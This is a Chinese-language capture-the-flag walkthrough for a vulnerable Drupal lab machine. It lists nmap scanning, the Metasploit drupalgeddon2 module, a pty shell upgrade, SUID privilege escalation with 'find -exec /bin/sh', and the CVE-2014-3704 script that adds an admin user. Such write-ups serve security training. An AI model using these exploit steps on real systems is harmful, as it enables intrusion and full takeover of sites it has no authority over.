一、环境搭建

靶场下载链接: 百度网盘 请输入提取码 提取码: ih67

1.查看kali的ip：ifconfig

二、信息收集

1.使用namp命令

主机探测: nmap -sP 192.168.101.0/24

 查看靶机开放端口号和服务:nmap -A 192.168.101.111

发现开放80端口,访问一下192.168.101.111

Drupal简介:

Drupal是开源CMS之一，Drupal是CMS内容管理系统，并且在世界各地使用，受到高度赞赏，Drupal可以作为开源软件免费使用。

Drupal大致可以分为基本部分和附加扩展，基本部分称为核心模块，包含作为CMS运行的标准程序，还可以根据要构建的网站随时添加必要的功能，是一个扩展模块，同时也是一个额外的扩展，具有一定的灵活性，因为它可以从各种功能中进行选择或组合使用。简单说就是附带了cms的php开发框架

2.使用msfconsole框架,看看有没有能够利用的脚本

在kali输入msfconsole,进入msf框架

 查看一下Drupal网站有什么可以利用的脚本:search drupal

使用第二个脚本: use exploit/unix/webapp/drupal_drupalgeddon2

查看要设置的参数：show options

设置一下RHOST：set RHOST 192.168.101.111

设置完参数直接，run执行一下攻击

三、提权

1.得到一个低权限用户

使用shell，进入到后台，并且用whoami查看当前用户

优化命令执行终端，执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

2.SUID提权

（1）查看具有的SUID的二进制可执行文件：find / -user root -perm -4000 -print 2>/dev/null

（2）已知的可用来提权的linux可行性文件列表如下:nmap、vim、find、bash、more、less、nano、cp

（3）利用find获得root权限shell：find / -name cron.php -exec "/bin/sh" \ ;

如上图所示已经拿到该靶机root用户权限，寻找flag文件：find / -name "*flag*.txt"

 分别cat /home/flag4/flag4.txt 、/var/www/flag1.txt、/root/thefinlflag.txt

3.拿到Drupal管理员权限

drupal使用CVE2014-3704添加管理员账号

CVE2014-3704脚本下载链接：Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit，使用的版本drupal:7.0-7.31

调用刚才下载好的脚本：Python 34992.py

调用脚本并且设置对象和登录到用户密码python 34992.py -t http://192.168.101.111 -u 1234 -p 1234

 进入最后给的那个地址，用自己创建的用户密码登录到网站后台

发现flag3